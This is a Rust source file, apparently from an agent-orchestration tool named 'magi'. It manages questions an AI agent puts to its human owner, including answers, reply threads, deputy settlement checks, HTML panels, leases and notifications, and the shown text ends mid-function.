1use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43pub const SCHEMA: u32 = 7;
60
61const POLL: Duration = Duration::from_secs(3);
70
71const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126const LOCK_STALE: Duration = Duration::from_secs(10);
129
130pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152const PANEL_DIR: &str = ".panel";
158
159const PANEL_HTML: &str = "index.html";
161
162const PANEL_TMP: &str = ".panel.tmp";
164
165pub fn valid_asset_name(name: &str) -> bool {
182 if name.is_empty() || name.len() > 64 || name.contains("..") {
183 return false;
184 }
185 let mut chars = name.chars();
186 chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187 && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194 Open,
196 Answered,
198 Abandoned,
202}
203
204impl QuestionStatus {
205 pub fn open(self) -> bool {
207 matches!(self, Self::Open)
208 }
209
210 pub fn as_str(self) -> &'static str {
212 match self {
213 Self::Open => "open",
214 Self::Answered => "answered",
215 Self::Abandoned => "abandoned",
216 }
217 }
218}
219
220#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229 Choice(String),
231 Text(String),
233}
234
235#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
243#[serde(tag = "do", rename_all = "lowercase")]
244pub enum ChoiceAction {
245 Resume {
247 run: String,
249 },
250 Requeue,
252 Done,
254}
255
256impl ChoiceAction {
257 pub fn parse(spec: &str, default_run: &str) -> Result<(String, Self)> {
262 let Some((label, verb)) = spec.rsplit_once('=') else {
263 bail!("`--action {spec}` must look like `<choice>=<resume[:run]|requeue|done>`");
264 };
265 let label = label.trim();
266 if label.is_empty() {
267 bail!("`--action {spec}` names no choice before `=`");
268 }
269 let verb = verb.trim();
270 let action = match verb.split_once(':') {
271 Some(("resume", run)) if !run.trim().is_empty() => Self::Resume {
272 run: run.trim().to_owned(),
273 },
274 None if verb == "resume" => {
275 if default_run.is_empty() {
276 bail!("`--action {spec}` names no run and MAGI_RUN is not set");
277 }
278 Self::Resume {
279 run: default_run.to_owned(),
280 }
281 }
282 None if verb == "requeue" => Self::Requeue,
283 None if verb == "done" => Self::Done,
284 _ => bail!(
285 "unknown action `{verb}` in `--action {spec}`; \
286 use resume[:<run>], requeue or done"
287 ),
288 };
289 Ok((label.to_owned(), action))
290 }
291
292 pub fn describe(&self) -> String {
294 match self {
295 Self::Resume { run } => format!("resume run {}", short(run)),
296 Self::Requeue => "requeue the task".to_owned(),
297 Self::Done => "mark the task done".to_owned(),
298 }
299 }
300}
301
302pub fn parse_actions(
305 specs: &[String],
306 choices: &[String],
307 default_run: &str,
308) -> Result<std::collections::BTreeMap<String, ChoiceAction>> {
309 let mut out = std::collections::BTreeMap::new();
310 for spec in specs {
311 let (label, action) = ChoiceAction::parse(spec, default_run)?;
312 if !choices.contains(&label) {
313 bail!(
314 "`--action {spec}`: `{label}` is not one of the --choice values ({})",
315 choices.join(", ")
316 );
317 }
318 if out.insert(label.clone(), action).is_some() {
319 bail!("more than one --action for `{label}`");
320 }
321 }
322 Ok(out)
323}
324
325#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
336#[serde(rename_all = "lowercase")]
337pub enum Who {
338 Operator,
340 Agent,
343}
344
345#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
353#[serde(deny_unknown_fields)]
354pub struct Turn {
355 pub who: Who,
357 pub body: String,
359 pub at: Timestamp,
361 #[serde(default, skip_serializing_if = "Option::is_none")]
366 pub note: Option<String>,
367}
368
369#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
371#[serde(rename_all = "lowercase")]
372pub enum WaiterKind {
373 Asker,
375 Daemon,
378 Deputy,
382}
383
384#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
396pub struct Deputy {
397 pub brief: String,
400 #[serde(default)]
402 pub agent: String,
403 #[serde(default)]
405 pub seat: Option<crate::agent::SeatState>,
406 #[serde(default)]
409 pub starts: u32,
410}
411
412impl Deputy {
413 pub fn new(brief: String) -> Self {
415 Self {
416 brief,
417 agent: String::new(),
418 seat: None,
419 starts: 0,
420 }
421 }
422}
423
424pub fn deputy_seat_key(id: &str) -> String {
426 format!("deputy-{}", short(id))
427}
428
429#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
434pub struct Waiter {
435 pub kind: WaiterKind,
437 pub since: Timestamp,
439}
440
441#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
450pub struct Lease {
451 pub kind: WaiterKind,
453 pub pid: u32,
455 pub beat_at: Timestamp,
457}
458
459impl Lease {
460 pub fn fresh(&self, now: Timestamp) -> bool {
462 now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
463 }
464}
465
466#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
468#[serde(deny_unknown_fields)]
469pub struct Question {
470 pub schema: u32,
472 pub id: String,
475 pub run: String,
477 pub node: String,
479 pub seat: String,
482 pub summary: String,
485 pub detail: String,
488 pub choices: Vec<String>,
492 #[serde(default)]
496 pub actions: std::collections::BTreeMap<String, ChoiceAction>,
497 #[serde(default)]
504 pub panel: bool,
505 #[serde(default)]
512 pub assets: Vec<String>,
513 pub status: QuestionStatus,
515 pub asked_at: Timestamp,
517 pub answered_at: Option<Timestamp>,
519 pub answer: Option<Answer>,
521 #[serde(default)]
530 pub thread: Vec<Turn>,
531 #[serde(default)]
546 pub answer_timeout: u64,
547 #[serde(default)]
553 pub cwd: Option<String>,
554 #[serde(default)]
556 pub waiter: Option<Waiter>,
557 #[serde(default)]
561 pub delivered_turns: usize,
562 #[serde(default)]
565 pub answer_delivered: bool,
566 #[serde(default)]
569 pub deputy: Option<Deputy>,
570 #[serde(default)]
574 pub consult: Option<ChatConsult>,
575}
576
577#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
579pub struct ChatConsult {
580 pub talk: String,
582 pub at: Timestamp,
584}
585
586impl Question {
587 pub fn run_names_task(&self) -> bool {
590 matches!(
591 self.node.as_str(),
592 crate::conduct::NODE | crate::triage::NODE | crate::triage::DEPS_NODE
593 )
594 }
595
596 pub fn new(
599 run: String,
600 node: String,
601 seat: String,
602 summary: String,
603 detail: String,
604 choices: Vec<String>,
605 ) -> Self {
606 Self {
607 schema: SCHEMA,
608 id: new_id(),
609 run,
610 node,
611 seat,
612 summary,
613 detail,
614 choices,
615 actions: std::collections::BTreeMap::new(),
616 panel: false,
617 assets: Vec::new(),
618 status: QuestionStatus::Open,
619 asked_at: Timestamp::now(),
620 answered_at: None,
621 answer: None,
622 thread: Vec::new(),
623 answer_timeout: 0,
624 cwd: None,
625 waiter: None,
626 delivered_turns: 0,
627 answer_delivered: false,
628 deputy: None,
629 consult: None,
630 }
631 }
632
633 pub fn short(&self) -> &str {
635 short(&self.id)
636 }
637
638 pub fn chosen_action(&self) -> Option<&ChoiceAction> {
641 match (&self.status, &self.answer) {
642 (QuestionStatus::Answered, Some(Answer::Choice(c))) => self.actions.get(c),
643 _ => None,
644 }
645 }
646
647 pub fn free_text(&self) -> bool {
649 self.choices.is_empty()
650 }
651
652 pub fn answer(&mut self, answer: Answer) -> Result<()> {
662 match self.status {
663 QuestionStatus::Answered => bail!(
664 "question {} was already answered; the run has moved on and a \
665 second answer would be a decision nobody acted on",
666 self.short()
667 ),
668 QuestionStatus::Abandoned => bail!(
669 "question {} was abandoned and the run behind it is gone",
670 self.short()
671 ),
672 QuestionStatus::Open => {}
673 }
674 let body = match &answer {
675 Answer::Choice(c) | Answer::Text(c) => c.as_str(),
676 };
677 if body.trim().is_empty() {
678 bail!(
679 "question {} needs an answer; an empty one tells the agent \
680 nothing and it would guess anyway",
681 self.short()
682 );
683 }
684 match &answer {
685 Answer::Choice(c) if self.free_text() => bail!(
686 "question {} asks for free text, so `{c}` cannot be a choice \
687 it offered",
688 self.short()
689 ),
690 Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
691 "`{c}` is not one of the choices question {} offers: {}",
692 self.short(),
693 self.choices.join(", ")
694 ),
695 Answer::Text(_) if !self.free_text() => bail!(
696 "question {} is multiple choice; answer with one of: {}",
697 self.short(),
698 self.choices.join(", ")
699 ),
700 _ => {}
701 }
702 self.answered_at = Some(Timestamp::now());
703 self.answer = Some(answer);
704 self.status = QuestionStatus::Answered;
705 Ok(())
706 }
707
708 pub fn abandon(&mut self, why: impl Into<String>) {
720 if !self.status.open() {
721 return;
722 }
723 self.status = QuestionStatus::Abandoned;
724 let why = why.into();
725 let why = why.trim();
726 if why.is_empty() {
727 return;
728 }
729 if !self.detail.is_empty() {
730 self.detail.push('\n');
731 }
732 self.detail.push_str("\n_Abandoned: ");
733 self.detail.push_str(why);
734 self.detail.push_str("._\n");
735 }
736
737 pub fn resolution(&self) -> Option<String> {
744 match (self.status, &self.answer) {
745 (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
746 Some(a.clone())
747 }
748 _ => None,
749 }
750 }
751
752 pub fn settle_by_deputy(
763 &mut self,
764 seat: &str,
765 label: &str,
766 quote: &str,
767 note: Option<&str>,
768 ) -> Result<()> {
769 let Some(deputy) = &self.deputy else {
770 bail!("question {} has no deputy", self.short());
771 };
772 let own = deputy.seat.as_ref().map(|s| s.key.as_str());
773 if own != Some(seat) {
774 bail!("only the deputy of question {} may settle it", self.short());
775 }
776 if !self.choices.iter().any(|c| c == label) {
777 bail!(
778 "`{label}` is not one of the choices offered on question {}",
779 self.short()
780 );
781 }
782 let quote = quote.trim();
783 if quote.is_empty()
784 || !self
785 .thread
786 .iter()
787 .any(|t| t.who == Who::Operator && t.body.contains(quote))
788 {
789 bail!(
790 "the quote is not something the owner said on question {}",
791 self.short()
792 );
793 }
794 let latest = self
797 .thread
798 .iter()
799 .rev()
800 .find(|t| t.who == Who::Operator)
801 .map(|t| t.body.trim());
802 if crate::deputy::merge_gated(self) {
803 let ok = if label == crate::land::APPROVE {
809 latest.is_some_and(|m| m.contains(quote))
810 } else if label == crate::land::HOLD {
811 latest.is_some_and(|m| {
812 quote.eq_ignore_ascii_case(label) && m.eq_ignore_ascii_case(label)
813 })
814 } else {
815 false
816 };
817 if !ok {
818 bail!(
819 "on a merge approval `{label}` settles it only when the quote is a \
820 verbatim part of the owner's latest message ({}); if the wording is \
821 doubtful, ask what they mean with `--thread` instead",
822 if label == crate::land::HOLD {
823 "for `hold`, the whole message"
824 } else {
825 "the quote must be the instruction itself"
826 }
827 );
828 }
829 } else if crate::deputy::destructive(self, label)
830 && !latest.is_some_and(|m| crate::land::unhedged(m, quote))
831 {
832 bail!(
833 "`{label}` cannot be undone; it settles question {} only when the owner's \
834 latest message clearly says so, unhedged and quoted verbatim (no maybe / if \
835 / not / question); ask what they mean with `--thread` instead",
836 self.short()
837 );
838 }
839 self.thread.push(Turn {
840 who: Who::Agent,
841 body: format!("Settled as `{label}` on the owner's words: \"{quote}\""),
842 at: Timestamp::now(),
843 note: note
844 .map(str::trim)
845 .filter(|n| !n.is_empty())
846 .map(str::to_owned),
847 });
848 self.delivered_turns = self.thread.len();
849 self.answer(Answer::Choice(label.to_owned()))
850 }
851
852 pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
863 match self.status {
864 QuestionStatus::Answered => bail!(
865 "question {} was already answered; there is nothing left to \
866 discuss",
867 self.short()
868 ),
869 QuestionStatus::Abandoned => bail!(
870 "question {} was abandoned and the run behind it is gone",
871 self.short()
872 ),
873 QuestionStatus::Open => {}
874 }
875 let body = body.into();
876 if body.trim().is_empty() {
877 bail!("a message to question {} cannot be empty", self.short());
878 }
879 self.thread.push(Turn {
880 who: Who::Operator,
881 body,
882 at: Timestamp::now(),
883 note: None,
884 });
885 Ok(())
886 }
887
888 pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
898 match self.status {
899 QuestionStatus::Answered => bail!(
900 "question {} was already answered; replying now would not \
901 reach anyone",
902 self.short()
903 ),
904 QuestionStatus::Abandoned => bail!(
905 "question {} was abandoned and the run behind it is gone",
906 self.short()
907 ),
908 QuestionStatus::Open => {}
909 }
910 let body = body.into();
911 if body.trim().is_empty() {
912 bail!("a reply to question {} cannot be empty", self.short());
913 }
914 self.actions.retain(|label, _| choices.contains(label));
916 self.choices = choices;
917 let unread = self.unread_from_owner().is_some();
918 self.thread.push(Turn {
919 who: Who::Agent,
920 body,
921 at: Timestamp::now(),
922 note: None,
923 });
924 if !unread {
928 self.delivered_turns = self.thread.len();
929 }
930 Ok(())
931 }
932
933 pub fn unread_from_owner(&self) -> Option<String> {
940 if !self.status.open() {
941 return None;
942 }
943 let said = self.undelivered_owner_turns();
944 (!said.is_empty()).then(|| said.join("\n\n"))
945 }
946
947 pub fn undelivered_owner_turns(&self) -> Vec<&str> {
953 let from = self.delivered_turns.min(self.thread.len());
954 self.thread[from..]
955 .iter()
956 .filter(|t| t.who == Who::Operator)
957 .map(|t| t.body.as_str())
958 .collect()
959 }
960
961 pub fn last_activity(&self) -> i64 {
965 self.thread
966 .iter()
967 .map(|t| t.at.as_second())
968 .max()
969 .unwrap_or(0)
970 .max(self.asked_at.as_second())
971 }
972
973 pub fn waiting_on_agent(&self) -> bool {
982 self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
983 }
984
985 fn should_notify(&self, now: Timestamp) -> bool {
993 let Some(last) = self
994 .thread
995 .iter()
996 .rev()
997 .find(|t| t.who == Who::Operator)
998 .map(|t| t.at)
999 else {
1000 return true;
1001 };
1002 now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
1003 }
1004}
1005
1006#[derive(Debug, Clone)]
1008pub struct Questions {
1009 root: PathBuf,
1010}
1011
1012impl Questions {
1013 pub fn open() -> Self {
1015 Self::at(crate::run::home().join("questions"))
1016 }
1017
1018 pub fn at(root: PathBuf) -> Self {
1021 Self { root }
1022 }
1023
1024 pub fn root(&self) -> &Path {
1026 &self.root
1027 }
1028
1029 pub fn path_of(&self, id: &str) -> PathBuf {
1031 self.root.join(format!("{id}.json"))
1032 }
1033
1034 pub fn panel_dir(&self, id: &str) -> PathBuf {
1036 self.root.join(format!("{id}{PANEL_DIR}"))
1037 }
1038
1039 pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
1063 if !valid_asset_name(&q.id) {
1064 bail!(
1065 "question id `{}` is not a name magi will build a panel path from",
1066 q.id
1067 );
1068 }
1069 if html.trim().is_empty() {
1070 bail!(
1071 "question {} was handed an empty panel; an empty frame reads to \
1072 the owner as \"the agent had nothing to say\", which is a lie",
1073 q.short()
1074 );
1075 }
1076
1077 let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
1080 for src in assets {
1081 let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
1082 if !valid_asset_name(name) {
1083 bail!(
1084 "panel asset `{}` cannot be stored: a panel file name must \
1085 match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
1086 src.display()
1087 );
1088 }
1089 if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
1090 bail!(
1091 "two panel assets are both named `{name}` - {} and {} - and \
1092 the panel can only show one of them; rename one at the source",
1093 first.display(),
1094 src.display()
1095 );
1096 }
1097 named.push((name.to_owned(), src.as_path()));
1098 }
1099
1100 let mut total = html.len() as u64;
1101 for (_, src) in &named {
1102 let meta = std::fs::metadata(src)
1103 .with_context(|| format!("stat panel asset {}", src.display()))?;
1104 if !meta.is_file() {
1105 bail!(
1106 "panel asset `{}` is not a file; a panel is html plus files \
1107 copied beside it",
1108 src.display()
1109 );
1110 }
1111 total = total.saturating_add(meta.len());
1112 }
1113 if total > PANEL_MAX_BYTES {
1114 bail!(
1115 "panel for question {} is {total} bytes, over magi's cap of \
1116 {PANEL_MAX_BYTES} bytes; nothing was written",
1117 q.short()
1118 );
1119 }
1120
1121 let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
1122 let dir = self.panel_dir(&q.id);
1123 std::fs::create_dir_all(&self.root)
1124 .with_context(|| format!("create {}", self.root.display()))?;
1125 clear_dir(&tmp)?;
1126 std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
1127 if let Err(e) = fill_panel(&tmp, html, &named) {
1128 let _ = std::fs::remove_dir_all(&tmp);
1131 return Err(e);
1132 }
1133 clear_dir(&dir)?;
1134 std::fs::rename(&tmp, &dir)
1135 .with_context(|| format!("move panel into {}", dir.display()))?;
1136
1137 q.panel = true;
1138 q.assets = named.into_iter().map(|(n, _)| n).collect();
1139 q.assets.sort_unstable();
1140 Ok(())
1141 }
1142
1143 pub fn panel_html(&self, id: &str) -> Option<String> {
1149 if !valid_asset_name(id) {
1150 return None;
1151 }
1152 std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
1153 }
1154
1155 pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
1166 if !valid_asset_name(name) {
1167 bail!(
1168 "`{name}` is not a panel file name; it must match \
1169 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
1170 );
1171 }
1172 if !valid_asset_name(id) {
1173 return Ok(None);
1174 }
1175 let dir = self.panel_dir(id);
1176 if !dir.is_dir() {
1177 return Ok(None);
1178 }
1179 let path = dir.join(name);
1180 match std::fs::read(&path) {
1181 Ok(bytes) => Ok(Some(bytes)),
1182 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
1183 Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
1184 }
1185 }
1186
1187 pub fn drop_panel(&self, id: &str) -> Result<()> {
1196 if !valid_asset_name(id) {
1197 bail!("question id `{id}` is not a name magi will build a panel path from");
1198 }
1199 clear_dir(&self.panel_dir(id))?;
1200 clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
1201 }
1202
1203 pub fn lease_path(&self, id: &str) -> PathBuf {
1205 self.root.join(format!("{id}.lease"))
1206 }
1207
1208 pub fn read_lease(&self, id: &str) -> Option<Lease> {
1210 let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
1211 serde_json::from_str(&body).ok()
1212 }
1213
1214 pub fn beat(&self, id: &str, kind: WaiterKind) {
1221 let lease = Lease {
1222 kind,
1223 pid: std::process::id(),
1224 beat_at: Timestamp::now(),
1225 };
1226 let path = self.lease_path(id);
1227 let tmp = path.with_extension("lease.tmp");
1228 let written = std::fs::create_dir_all(&self.root)
1229 .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
1230 .and_then(|()| std::fs::rename(&tmp, &path));
1231 if let Err(e) = written {
1232 tracing::debug!("could not beat the lease on question {id}: {e}");
1233 }
1234 }
1235
1236 pub fn drop_lease(&self, id: &str) {
1238 let _ = std::fs::remove_file(self.lease_path(id));
1239 }
1240
1241 pub fn update<T>(
1252 &self,
1253 id: &str,
1254 f: impl FnOnce(&mut Question) -> Result<T>,
1255 ) -> Result<(Question, T)> {
1256 std::fs::create_dir_all(&self.root)
1257 .with_context(|| format!("create {}", self.root.display()))?;
1258 let lock = self.root.join(format!("{id}.lock"));
1259 let started = std::time::Instant::now();
1260 loop {
1261 match std::fs::OpenOptions::new()
1262 .write(true)
1263 .create_new(true)
1264 .open(&lock)
1265 {
1266 Ok(_) => break,
1267 Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
1268 let stale = std::fs::metadata(&lock)
1269 .and_then(|m| m.modified())
1270 .ok()
1271 .and_then(|t| t.elapsed().ok())
1272 .is_some_and(|age| age > LOCK_STALE);
1273 if stale {
1274 let _ = std::fs::remove_file(&lock);
1275 } else if started.elapsed() > LOCK_STALE {
1276 bail!("could not lock question {id}");
1277 } else {
1278 std::thread::sleep(Duration::from_millis(15));
1279 }
1280 }
1281 Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
1282 }
1283 }
1284 struct Unlock(PathBuf);
1285 impl Drop for Unlock {
1286 fn drop(&mut self) {
1287 let _ = std::fs::remove_file(&self.0);
1288 }
1289 }
1290 let _guard = Unlock(lock);
1291 let mut q = read_path(&self.path_of(id))?;
1292 let out = f(&mut q)?;
1293 self.put(&mut q)?;
1294 Ok((q, out))
1295 }
1296
1297 pub fn put(&self, q: &mut Question) -> Result<()> {
1301 std::fs::create_dir_all(&self.root)
1302 .with_context(|| format!("create {}", self.root.display()))?;
1303 let body = serde_json::to_string_pretty(q).context("serialize question")?;
1304 let path = self.path_of(&q.id);
1305 let tmp = path.with_extension("json.tmp");
1306 let is_new = !path.exists();
1307 std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1308 std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1309 if is_new
1312 && q.status.open()
1313 && q.node != crate::bump::NOTICE_NODE
1314 && let Some(home) = self.root.parent().filter(|p| !p.as_os_str().is_empty())
1315 {
1316 crate::notices::quiet_for(home, q);
1317 }
1318 Ok(())
1319 }
1320
1321 pub fn get(&self, id: &str) -> Result<Question> {
1323 let resolved = self.resolve_id(id)?;
1324 read_path(&self.path_of(&resolved))
1325 }
1326
1327 pub fn list(&self) -> Vec<Question> {
1335 let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1336 .into_iter()
1337 .flatten()
1338 .flatten()
1339 .map(|e| e.path())
1340 .filter(|p| p.extension().is_some_and(|x| x == "json"))
1341 .filter_map(|p| read_path(&p).ok())
1342 .collect();
1343 all.sort_unstable_by(|a, b| {
1344 let rank = |q: &Question| u8::from(!q.status.open());
1345 rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1346 });
1347 all
1348 }
1349
1350 pub fn open_for(&self, run: &str) -> Vec<Question> {
1356 self.list()
1357 .into_iter()
1358 .filter(|q| q.status.open() && q.run == run)
1359 .collect()
1360 }
1361
1362 pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1375 let mut abandoned = 0;
1376 for mut q in self.open_for(run) {
1377 q.abandon(why);
1378 self.put(&mut q)?;
1379 abandoned += 1;
1380 }
1381 Ok(abandoned)
1382 }
1383
1384 pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1408 if status.resumable() {
1409 return Ok(0);
1410 }
1411 let why = format!(
1412 "run {run} {}, so nothing is waiting for this answer",
1413 status.as_str()
1414 );
1415 let mut abandoned = 0;
1420 for mut q in self.open_for(run) {
1421 if q.node == crate::bump::NOTICE_NODE {
1422 continue;
1423 }
1424 q.abandon(&why);
1425 self.put(&mut q)?;
1426 abandoned += 1;
1427 }
1428 Ok(abandoned)
1429 }
1430
1431 pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1434 if self.path_of(prefix).is_file() {
1435 return Ok(prefix.to_owned());
1436 }
1437 let hits: Vec<String> = self
1438 .list()
1439 .into_iter()
1440 .map(|q| q.id)
1441 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1442 .collect();
1443 match hits.len() {
1444 1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1445 0 => bail!("no question matches `{prefix}`"),
1446 _ => bail!(
1447 "`{prefix}` matches {} questions: {}",
1448 hits.len(),
1449 hits.join(", ")
1450 ),
1451 }
1452 }
1453
1454 pub fn revision(&self) -> u64 {
1458 std::fs::read_dir(&self.root)
1459 .into_iter()
1460 .flatten()
1461 .flatten()
1462 .filter_map(|e| e.metadata().ok())
1463 .filter_map(|m| m.modified().ok())
1464 .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1465 .map(|d| d.as_millis() as u64)
1466 .max()
1467 .unwrap_or(0)
1468 }
1469
1470 pub fn count_open(&self) -> usize {
1476 self.list().iter().filter(|q| q.status.open()).count()
1477 }
1478
1479 pub fn count_needs_owner(&self) -> usize {
1488 self.list()
1489 .iter()
1490 .filter(|q| q.status.open() && !q.waiting_on_agent())
1491 .count()
1492 }
1493}
1494
1495#[derive(Debug, Clone, PartialEq, Eq)]
1497pub enum Wait {
1498 Answered(String),
1500 Replied(String),
1505 Pending,
1512 Abandoned,
1517}
1518
1519pub async fn ask_and_wait(
1526 q: &mut Question,
1527 store: &Questions,
1528 notify: &config::Notify,
1529 timeout: Duration,
1530) -> Result<Wait> {
1531 wait_for_owner(q, store, notify, timeout, POLL).await
1532}
1533
1534pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1549 wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1550}
1551
1552async fn wait_for_owner(
1558 q: &mut Question,
1559 store: &Questions,
1560 cfg: &config::Notify,
1561 timeout: Duration,
1562 poll: Duration,
1563) -> Result<Wait> {
1564 if !store.path_of(&q.id).is_file() {
1568 store.put(q).context("file the question")?;
1569 }
1570 if q.should_notify(Timestamp::now()) {
1571 if let Err(e) = notify(cfg, q).await {
1572 tracing::warn!(
1577 "could not notify about question {}: {e:#} - the web UI is the \
1578 only surface for it now",
1579 q.short()
1580 );
1581 }
1582 }
1583 tracing::info!(
1584 "question {} from {} is waiting for you: {}",
1585 q.short(),
1586 q.seat,
1587 q.summary
1588 );
1589 wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1590}
1591
1592fn hold(store: &Questions, id: &str) {
1594 store.beat(id, WaiterKind::Asker);
1595 let took = store.update(id, |q| {
1596 if q.status.open() {
1597 q.waiter = Some(Waiter {
1598 kind: WaiterKind::Asker,
1599 since: Timestamp::now(),
1600 });
1601 }
1602 Ok(())
1603 });
1604 if let Err(e) = took {
1605 tracing::debug!("could not note the wait on question {id}: {e:#}");
1606 }
1607}
1608
1609pub fn hand_over(store: &Questions, q: &mut Question) {
1617 let done = store.update(&q.id, |r| {
1618 r.delivered_turns = r.delivered_turns.max(q.thread.len());
1619 if r.status == QuestionStatus::Answered {
1620 r.answer_delivered = true;
1621 }
1622 r.waiter = None;
1623 Ok(())
1624 });
1625 match done {
1626 Ok((fresh, ())) => *q = fresh,
1627 Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1628 }
1629}
1630
1631pub fn answer_for_agent(q: &Question, answer: &str) -> String {
1635 let says = q.undelivered_owner_turns();
1636 if says.is_empty() {
1637 return answer.to_owned();
1638 }
1639 format!(
1640 "the owner also said, before answering:\n\n{}\n\nthe owner answered:\n\n{answer}",
1641 says.join("\n\n")
1642 )
1643}
1644
1645pub fn deliver_answer(
1648 store: &Questions,
1649 q: &mut Question,
1650 answer: &str,
1651 out: &mut impl std::io::Write,
1652) -> std::io::Result<()> {
1653 writeln!(out, "{}", answer_for_agent(q, answer))?;
1654 out.flush()?;
1655 hand_over(store, q);
1656 Ok(())
1657}
1658
1659async fn wait_loop(
1669 q: &mut Question,
1670 store: &Questions,
1671 timeout: Duration,
1672 slice: Duration,
1673 poll: Duration,
1674) -> Result<Wait> {
1675 if let Some(said) = q.unread_from_owner() {
1685 return Ok(Wait::Replied(said));
1686 }
1687 hold(store, &q.id);
1688
1689 let bounded = timeout.min(slice);
1690 let is_the_real_deadline = bounded >= timeout;
1691 let deadline = tokio::time::Instant::now() + bounded;
1692 loop {
1693 let now = tokio::time::Instant::now();
1694 if now >= deadline {
1695 if !is_the_real_deadline {
1696 return Ok(Wait::Pending);
1700 }
1701 let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1702 let (fresh, unread) = store
1706 .update(&q.id, |r| {
1707 let unread = r.unread_from_owner();
1708 if unread.is_none() {
1709 r.abandon(&why);
1710 r.waiter = None;
1711 }
1712 Ok(unread)
1713 })
1714 .context("record the abandoned question")?;
1715 *q = fresh;
1716 if let Some(said) = unread {
1717 return Ok(Wait::Replied(said));
1718 }
1719 tracing::warn!(
1720 "question {} went unanswered for {}s; the run parks and the \
1721 question stays as the record of it",
1722 q.short(),
1723 timeout.as_secs()
1724 );
1725 return Ok(Wait::Abandoned);
1726 }
1727 tokio::time::sleep(poll.min(deadline - now)).await;
1728 store.beat(&q.id, WaiterKind::Asker);
1729 match store.get(&q.id) {
1730 Ok(fresh) if !fresh.status.open() => {
1731 *q = fresh;
1735 return Ok(match q.resolution() {
1736 Some(a) => Wait::Answered(a),
1737 None => Wait::Abandoned,
1740 });
1741 }
1742 Ok(fresh) => {
1743 if let Some(said) = fresh.unread_from_owner() {
1744 *q = fresh;
1745 return Ok(Wait::Replied(said));
1746 }
1747 }
1750 Err(e) => {
1751 tracing::debug!("could not re-read question {}: {e:#}", q.short());
1755 }
1756 }
1757 }
1758}
1759
1760pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1771 notify_text(cmd, &q.run, &q.summary).await
1772}
1773
1774pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1777 let Some((program, args)) = cmd.command.split_first() else {
1778 return Ok(());
1780 };
1781 let url = web_url();
1782 if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1783 tracing::warn!(
1784 "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1785 so the link will be empty - export it next to `magi serve` with \
1786 the address `magi web --open` printed"
1787 );
